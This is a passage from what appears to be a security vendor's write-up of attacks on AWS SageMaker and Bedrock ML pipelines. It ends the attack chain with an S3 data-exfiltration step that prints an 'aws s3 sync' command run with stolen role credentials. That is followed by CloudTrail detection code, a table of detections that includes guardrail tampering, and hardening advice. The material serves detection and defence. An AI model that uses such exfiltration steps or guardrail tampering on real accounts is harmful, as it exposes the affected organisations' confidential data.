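          .get("s3Configuration") or {})
    reasons = []
    owner = s3.get("bucketOwnerAccountId")
    if owner and owner != rec.get("recipientAccountId"):
        reasons.append(f"bucket owned by another account ({owner})")
    bucket = s3.get("bucketArn")
    if bucket and bucket not in approved_buckets:
        reasons.append(f"bucket not on allowlist ({bucket})")
    return reasons
```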

Step 8 – Sensitive model inference data exfiltration (AML.T0025 - Exfiltration via cyber means)

Finally, the attacker uses the Lambda role credentials to access sensitive model inference data. They exfiltrate information from an S3 bucket in the production environment that the Bedrock model uses for inference. This bucket contains crucial data for the model's operations, including user inputs and proprietary information. By compromising it, the attacker can expose confidential data, which could lead to identity theft, fraud, or further exploitation of the organization's systems.

AWS CLI Command:

aws s3 sync s3://bucket-name .
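A bulk copy such as this `sync` shows up as a burst of `GetObject` calls, but only if S3 data events are enabled on the trail. Management events alone do not record object reads. The sketch below counts successful `GetObject` calls per principal and bucket over a batch of records, such as one hour of logs, and flags counts at or above a threshold. The bucket comes from `requestParameters.bucketName`, and the default threshold of 100 is an arbitrary assumption.

```python
from collections import Counter


def bulk_reads(records, threshold=100):
    """Return {(principal_arn, bucket): count} for successful GetObject
    calls whose count meets or exceeds the threshold."""
    counts = Counter()
    for rec in records:
        if rec.get("eventName") != "GetObject" or rec.get("errorCode"):
            continue
        principal = rec.get("userIdentity", {}).get("arn", "unknown")
        bucket = (rec.get("requestParameters") or {}).get("bucketName")
        counts[(principal, bucket)] += 1
    return {key: n for key, n in counts.items() if n >= threshold}
```

The Lambda role may legitimately read this bucket, so a stronger baseline compares each principal's volume against its own history rather than against a fixed number.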

Visibility into attacks with Trend Vision One workbenches

Trend Vision One is an enterprise cybersecurity platform that simplifies security and helps organizations detect and stop threats faster by consolidating multiple security capabilities, enabling greater command of the enterprise’s attack surface, and providing complete visibility into its cyber risk posture. The cloud-based platform leverages AI and threat intelligence from 250 million sensors and 16 threat research centers around the globe to provide comprehensive risk insights, earlier threat detection, and automated risk and threat response options in a single solution.

Trend Vision One ingests CloudTrail logs to monitor critical and suspicious events in the AWS account. The following detections trigger when the attack chains described above are executed:

| Scenario/Step | Workbench | Description | Key Fields to Monitor in Workbench Hits (also useful for threat hunting) |
|---|---|---|---|
| 1.1/2 | AWS SageMaker Successful Service Enumeration Detected | Successful service enumeration detected in AWS SageMaker, indicating potential security reconnaissance | 1. eventName 2. sourceIPAddress 3. userIdentity.arn 4. requestParameters 5. userAgent 6. userIdentity.accessKeyId |
| 1.1/2 | IAM Successful Enumeration Attempt | Successful service enumeration detected in AWS IAM, indicating potential security reconnaissance | 1. eventName 2. sourceIPAddress 3. userIdentity.arn 4. requestParameters 5. userAgent 6. userIdentity.accessKeyId |
| 1.1/3 | AWS SageMaker Notebook Instance Created With Direct Internet Access | AWS SageMaker notebook instance configured to allow direct internet access, potentially exposing it to security risks | 1. sourceIPAddress 2. requestParameters.notebookInstanceName 3. userIdentity.arn 4. userIdentity.accessKeyId 5. eventName |
| 1.1/3 | AWS SageMaker Notebook Instance Created or Updated With Root Access | AWS SageMaker notebook instance created or modified to grant root access, posing potential security risks | 1. sourceIPAddress 2. requestParameters.notebookInstanceName 3. userIdentity.arn 4. userIdentity.accessKeyId |
| 1.1/3 | AWS SageMaker Notebook Instance Creation or Update with Default Execution Role | AWS SageMaker notebook instance created or updated to use the default execution role, posing a potential risk of privilege escalation | 1. sourceIPAddress 2. requestParameters.notebookInstanceName 3. userIdentity.arn 4. userIdentity.accessKeyId 5. requestParameters.roleArn 6. eventName |
| 1.1/3 | AWS SageMaker Notebook Instance Configured With Admin Role | AWS SageMaker notebook instance configured to use an admin role, posing potential security risks | 1. sourceIPAddress 2. requestParameters.notebookInstanceName 3. userIdentity.arn 4. userIdentity.accessKeyId 5. requestParameters.roleArn 6. eventName |
| 1.1/5, 1.2/5 | AWS Bedrock Guardrails Updated | Guardrail update detected in AWS Bedrock, indicating potential security modifications | 1. sourceIPAddress 2. userIdentity.arn 3. userIdentity.accessKeyId 4. requestParameters.roleArn 5. requestParameters.guardrailIdentifier 6. eventName |
| 1.2/6 | AWS Bedrock Successful Service Enumeration Detected | Successful service enumeration detected in AWS Bedrock, indicating potential security reconnaissance | 1. eventName 2. sourceIPAddress 3. userIdentity.arn 4. requestParameters 5. userAgent 6. userIdentity.accessKeyId |
| 1.2/7 | AWS Bedrock Knowledge Base Cross-Account S3 Data Source Configuration Updated | Cross-account S3 data source configuration updated in AWS Bedrock Knowledge Base, indicating potential security modifications | 1. eventName 2. sourceIPAddress 3. userIdentity.arn 4. requestParameters 5. userAgent 6. userIdentity.accessKeyId 7. requestParameters.dataSourceConfiguration.s3Configuration 8. requestParameters.dataSourceConfiguration.s3Configuration.bucketOwnerAccountId |
| 1.2/8 | AWS S3 Bucket Data Exfiltration | Data exfiltration detected from AWS S3 bucket, indicating potential security breach | 1. eventName 2. sourceIPAddress 3. userIdentity.arn 4. requestParameters 5. userAgent 6. userIdentity.accessKeyId |
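To make a few of these detections more concrete, here is a minimal Python sketch that approximates them over raw CloudTrail records already parsed from JSON. It is not how Trend Vision One implements its workbenches. The rule names and enumeration threshold are hypothetical, the camelCase requestParameters keys (directInternetAccess, rootAccess, and the dataSourceConfiguration path from the table) are assumptions to verify against real events in your account, and the Bedrock eventSource value assumes control-plane calls are logged under bedrock.amazonaws.com. CloudTrail may also omit or redact some request fields.

```python
from collections import Counter
from typing import Any, Dict, Iterable, List

SAGEMAKER = "sagemaker.amazonaws.com"
BEDROCK = "bedrock.amazonaws.com"  # assumption: eventSource for Bedrock control-plane calls
IAM = "iam.amazonaws.com"


def get_path(record: Dict[str, Any], path: str) -> Any:
    """Follow a dotted path such as 'userIdentity.arn'; return None if a key is missing."""
    current: Any = record
    for key in path.split("."):
        if not isinstance(current, dict):
            return None
        current = current.get(key)
    return current


def match_rules(event: Dict[str, Any], own_account_id: str) -> List[str]:
    """Return the hypothetical rule names that one CloudTrail record matches."""
    hits: List[str] = []
    source = event.get("eventSource")
    name = event.get("eventName")
    params = event.get("requestParameters") or {}

    if source == SAGEMAKER and name == "CreateNotebookInstance":
        # Both settings default to "Enabled" when omitted (check the SageMaker API reference).
        if params.get("directInternetAccess", "Enabled") == "Enabled":
            hits.append("notebook-direct-internet-access")
        if params.get("rootAccess", "Enabled") == "Enabled":
            hits.append("notebook-root-access")
    elif source == SAGEMAKER and name == "UpdateNotebookInstance":
        # On update, an omitted field leaves the setting unchanged, so only flag explicit values.
        if params.get("rootAccess") == "Enabled":
            hits.append("notebook-root-access")
    elif source == BEDROCK and name == "UpdateGuardrail":
        hits.append("bedrock-guardrail-updated")
    elif source == BEDROCK and name in ("CreateDataSource", "UpdateDataSource"):
        owner = get_path(params, "dataSourceConfiguration.s3Configuration.bucketOwnerAccountId")
        if owner and owner != own_account_id:
            hits.append("kb-cross-account-s3-source")
    return hits


def enumeration_suspects(events: Iterable[Dict[str, Any]], threshold: int = 20) -> Dict[str, int]:
    """Count successful List*/Describe*/Get* calls per principal; keep those at or above threshold."""
    counts: Counter = Counter()
    for event in events:
        if event.get("errorCode"):  # failed calls do not count as successful enumeration
            continue
        if event.get("eventSource") not in (SAGEMAKER, BEDROCK, IAM):
            continue
        if str(event.get("eventName", "")).startswith(("List", "Describe", "Get")):
            counts[get_path(event, "userIdentity.arn")] += 1
    return {arn: n for arn, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    sample = {
        "eventSource": SAGEMAKER,
        "eventName": "CreateNotebookInstance",
        "userIdentity": {"arn": "arn:aws:iam::111122223333:user/example"},
        "requestParameters": {"notebookInstanceName": "demo", "rootAccess": "Disabled"},
    }
    print(match_rules(sample, "111122223333"))  # ['notebook-direct-internet-access']
```

Counting only successful read-style calls per principal mirrors the "successful enumeration" framing of the workbenches; a production rule would also bound the count to a time window.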

Best practices for securing ML pipelines in AWS

To help enterprises secure their ML pipelines in AWS, we provide the following recommendations.

1. Principle of least privilege

- Implement IAM roles and policies following the principle of least privilege, ensuring that all users, roles, and services in the ML pipeline have only the permissions they need. For example:

- Amazon Bedrock: Ensure that service roles are not overly permissive. Define permissions boundaries for IAM identities used in Bedrock and review role policies regularly to minimize unnecessary access.

- Verify that Bedrock agents use active service roles, and customize the security groups of Bedrock jobs to restrict network access.

- Amazon SageMaker: Ensure SageMaker notebook instances reference active execution roles, and enforce permissions boundaries to prevent privilege escalation.
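As one way to act on these recommendations, the following sketch reviews an IAM policy document (parsed from JSON) for patterns that commonly undermine least privilege in SageMaker and Bedrock roles: wildcard actions such as sagemaker:* or bedrock:*, Allow statements that use NotAction, and iam:PassRole granted on every resource, which can let a principal attach a more privileged role to a notebook or job. The checks and finding strings are illustrative assumptions, not an exhaustive linter; IAM Access Analyzer policy validation is the managed option for this kind of review.

```python
from typing import Any, Dict, List


def as_list(value: Any) -> List[str]:
    """IAM accepts either a single string or a list for Action and Resource."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def overly_permissive_statements(policy: Dict[str, Any]) -> List[str]:
    """Return human-readable findings for risky Allow statements in a policy document."""
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a lone statement may be an object rather than a list
        statements = [statements]

    findings: List[str] = []
    for index, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow":
            continue
        sid = stmt.get("Sid", f"statement {index}")
        # IAM action names are case-insensitive, so compare in lowercase.
        actions = [a.lower() for a in as_list(stmt.get("Action"))]
        resources = as_list(stmt.get("Resource"))

        for action in actions:
            if action == "*" or action.endswith(":*"):
                findings.append(f"{sid}: wildcard action {action}")
        if "NotAction" in stmt:
            findings.append(f"{sid}: Allow combined with NotAction")
        if "iam:passrole" in actions and "*" in resources:
            findings.append(f"{sid}: iam:PassRole on all resources")
    return findings


if __name__ == "__main__":
    policy = {
        "Version": "2012-10-17",
        "Statement": [
            {"Sid": "Notebook", "Effect": "Allow", "Action": "sagemaker:*", "Resource": "*"},
            {"Sid": "Pass", "Effect": "Allow", "Action": ["iam:PassRole"], "Resource": "*"},
            {"Sid": "Read", "Effect": "Allow", "Action": "s3:GetObject",
             "Resource": "arn:aws:s3:::example-bucket/*"},
        ],
    }
    for finding in overly_permissive_statements(policy):
        print(finding)
```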

2. Use built-in AWS security features of SageMaker and Bedrock

- Enable and configure additional security features offered by SageMaker and Bedrock:

- Encryption: Use AWS KMS Customer-Managed Keys (CMKs) for encrypting data at rest, including Bedrock guardrails, SageMaker notebook data, custom models, and knowledge base data.

- VPC and network isolation: Protect SageMaker and Bedrock workloads by using VPC isolation for all model training and deployment jobs. For SageMaker, also enable VPC-only mode and network isolation to restrict public access and protect sensitive operations.

- Guardrails in Bedrock: Ensure that sensitive information filters are configured and that the prompt attack filter strength is set appropriately to mitigate prompt injection attacks. Maintain proper version control of guardrails and monitor each version that goes into production.
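Several of these settings map directly to request parameters. The following sketch only builds dictionaries, so it runs without AWS credentials; the intent is that they would be passed to the boto3 SageMaker create_notebook_instance and Bedrock create_guardrail calls. The helper names, instance type, blocked-request messages, PII entity choices, and filter strengths are example assumptions to adapt to your environment.

```python
from typing import Any, Dict, List


def hardened_notebook_params(name: str, role_arn: str, subnet_id: str,
                             security_group_ids: List[str], kms_key_id: str) -> Dict[str, Any]:
    """Keyword arguments intended for boto3 SageMaker create_notebook_instance."""
    return {
        "NotebookInstanceName": name,
        "InstanceType": "ml.t3.medium",      # example size; choose one for your workload
        "RoleArn": role_arn,                 # a scoped execution role, not an admin role
        "SubnetId": subnet_id,               # required when direct internet access is disabled
        "SecurityGroupIds": security_group_ids,
        "KmsKeyId": kms_key_id,              # customer managed key for the attached storage volume
        "DirectInternetAccess": "Disabled",  # traffic goes through your VPC only
        "RootAccess": "Disabled",
    }


def guardrail_params(name: str, kms_key_id: str) -> Dict[str, Any]:
    """Keyword arguments intended for boto3 Bedrock create_guardrail."""
    return {
        "name": name,
        "blockedInputMessaging": "Sorry, this request cannot be processed.",
        "blockedOutputsMessaging": "Sorry, this response cannot be shown.",
        "contentPolicyConfig": {
            "filtersConfig": [
                # The prompt attack filter applies to inputs only, so outputStrength is NONE.
                {"type": "PROMPT_ATTACK", "inputStrength": "HIGH", "outputStrength": "NONE"},
            ]
        },
        "sensitiveInformationPolicyConfig": {
            "piiEntitiesConfig": [
                {"type": "EMAIL", "action": "ANONYMIZE"},
                {"type": "US_SOCIAL_SECURITY_NUMBER", "action": "BLOCK"},
            ]
        },
        "kmsKeyId": kms_key_id,  # encrypt the guardrail with a customer managed key
    }
```

With credentials configured, passing these dictionaries as keyword arguments to `boto3.client("sagemaker").create_notebook_instance` and `boto3.client("bedrock").create_guardrail` would submit them. Publishing each guardrail change with `create_guardrail_version` yields discrete versions that can be reviewed before they reach production.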

3. ML coding best practices

- Follow secure ML coding practices, which include:

- Sanitizing model outputs: Ensure that all model outputs are properly sanitized to prevent leakage of sensitive data. This includes filtering out personally identifiable information (PII) or other confidential data using Bedrock guardrails.

- Adversarial robustness: Integrate robust testing frameworks to help detect adversarial attacks such as data poisoning.

- Version control: Maintain clear version control over data, models, and pipeline configurations to ensure traceability and rollback capability in case of an issue.

- Be cautious with third-party extensions or vulnerable libraries: Ensure that third-party libraries and extensions used within the ML pipeline are properly vetted and kept up to date. Automate security scans and dependency checks to prevent vulnerabilities from entering the production environment.

- Run code produced by code generation models in a sandbox before executing it in any production environment.
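Bedrock guardrails are the managed control for filtering PII from model outputs. As an additional application-side safety net, a minimal sketch like the following could redact a few obvious patterns before output is logged or returned. The pattern set and placeholder labels are hypothetical and far from complete; regular expressions miss many forms of sensitive data and should complement guardrails, not replace them.

```python
import re

# Illustrative patterns only; real PII detection needs much broader coverage.
_PATTERNS = {
    "EMAIL": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "US_SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "AWS_ACCESS_KEY_ID": re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b"),
}


def redact(text: str) -> str:
    """Replace each pattern match with a bracketed label such as [EMAIL]."""
    for label, pattern in _PATTERNS.items():
        text = pattern.sub(f"[{label}]", text)
    return text


if __name__ == "__main__":
    print(redact("Contact jane.doe@example.com, SSN 123-45-6789"))
    # Contact [EMAIL], SSN [US_SSN]
```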

4. Monitoring MLOps pipeline events

- Set up comprehensive monitoring to track all ML pipeline activities:

- Use AWS CloudTrail and CloudWatch to monitor both SageMaker and Bedrock operations. Ensure model invocation logging is enabled to track when and how models are being used.

- Implement anomaly detection using Amazon CloudWatch Metrics and alarms to automatically notify when unusual activities or performance issues arise in the ML pipeline.
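CloudWatch anomaly detection builds its own models for metrics, so the following is only a simplified stand-in to illustrate the idea: flag an hour whose invocation count deviates from a trailing window by more than a chosen number of standard deviations. The input is assumed to be hourly counts, for example exported from the AWS/Bedrock Invocations metric or aggregated from model invocation logs; the function name, the 24-hour window, and the threshold of 3 are arbitrary example choices.

```python
from statistics import mean, pstdev
from typing import List, Sequence


def anomalous_hours(counts: Sequence[float], baseline: int = 24,
                    z_threshold: float = 3.0) -> List[int]:
    """Return indices whose value is more than z_threshold standard deviations
    away from the mean of the preceding `baseline` values."""
    flagged: List[int] = []
    for i in range(baseline, len(counts)):
        window = counts[i - baseline:i]
        mu = mean(window)
        sigma = pstdev(window)
        if sigma == 0:
            # A perfectly flat baseline: any change at all is treated as anomalous.
            if counts[i] != mu:
                flagged.append(i)
            continue
        if abs(counts[i] - mu) / sigma > z_threshold:
            flagged.append(i)
    return flagged


if __name__ == "__main__":
    hourly = [10, 12] * 12 + [11, 200]  # a sudden burst in the final hour
    print(anomalous_hours(hourly))  # [25]
```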

5. Implementing explainable AI (XAI)

- Enhance security through explainable AI (XAI) techniques that provide transparency into model decision-making processes. This can help in identifying and mitigating attacks such as:

- Model tampering: Use XAI to detect shifts in model behaviour that may indicate tampering or adversarial manipulation.

- Bias detection: Continuously monitor for biases that could have been introduced during training or through external attack vectors, enabling quick corrective actions.
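One model-agnostic XAI technique that fits the tampering use case is permutation feature importance: shuffle one feature at a time and measure how much the model's error grows. The following sketch computes it for a baseline and a candidate model version on the same reference data, then compares the normalized importance vectors. A large shift in which features drive predictions may point to tampering or poisoning and is worth investigating. The plain-callable model interface, the mean absolute error metric, and any alert threshold are assumptions; libraries such as SHAP offer richer attributions.

```python
import random
from typing import Callable, List, Sequence

Model = Callable[[Sequence[float]], float]  # hypothetical interface: features -> prediction


def permutation_importance(model: Model, X: List[List[float]], y: List[float],
                           seed: int = 0) -> List[float]:
    """Increase in mean absolute error when each feature column is shuffled in turn."""
    def mean_abs_error(rows: List[List[float]]) -> float:
        return sum(abs(model(row) - target) for row, target in zip(rows, y)) / len(y)

    base_error = mean_abs_error(X)
    # A fresh generator per call means two models scored on the same X see identical shuffles.
    rng = random.Random(seed)
    importances: List[float] = []
    for j in range(len(X[0])):
        column = [row[j] for row in X]
        rng.shuffle(column)
        permuted = [row[:j] + [value] + row[j + 1:] for row, value in zip(X, column)]
        importances.append(mean_abs_error(permuted) - base_error)
    return importances


def attribution_shift(baseline: List[float], candidate: List[float]) -> float:
    """L1 distance between importance vectors normalized to sum to 1 (at most 2)."""
    def normalize(values: List[float]) -> List[float]:
        clipped = [max(v, 0.0) for v in values]  # negative importance is treated as zero
        total = sum(clipped)
        return [v / total for v in clipped] if total > 0 else clipped

    return sum(abs(a - b) for a, b in zip(normalize(baseline), normalize(candidate)))


if __name__ == "__main__":
    X = [[float(i), float((i * 7) % 10)] for i in range(20)]
    y = [row[0] for row in X]

    def baseline_model(row: Sequence[float]) -> float:
        return row[0]  # relies on feature 0

    def candidate_model(row: Sequence[float]) -> float:
        return row[1]  # hypothetical tampered version relying on feature 1

    shift = attribution_shift(permutation_importance(baseline_model, X, y),
                              permutation_importance(candidate_model, X, y))
    print(f"attribution shift: {shift:.2f}")
```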
